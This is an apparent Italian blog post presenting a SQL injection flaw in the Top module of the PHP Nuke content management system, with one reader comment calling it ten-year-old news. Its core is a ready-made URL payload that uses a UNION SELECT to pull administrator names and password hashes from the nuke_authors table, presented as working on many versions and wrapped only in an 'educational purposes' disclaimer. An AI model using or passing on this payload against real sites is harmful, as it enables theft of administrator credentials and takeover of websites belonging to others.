SQL injection PHP Nuke

Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei contenuti) e come ogni CMS che si rispetti (ormai è difficile trovare CMS senza vulnerabilità :D ) ha qualche falla :-P

Quella che vi presento oggi è una falla nel modulo Top.Di seguito trovate il codice ;)

/modules.php?name=Top&querylang=%20WHERE%201=1%20UNION+ ALL%20SELECT%200,pwd,aid,0%20FROM%20nuke_authors–


Funziona su molte versioni di PHP Nuke.Ovviamente è tutto a scopo informativo e didattico :)

Michele

Leggi anche:

  • http://Sitoweb pippo

    roba vecchia… ma perchè postate ste scemenze di 10 anni fa?

Switch to our mobile site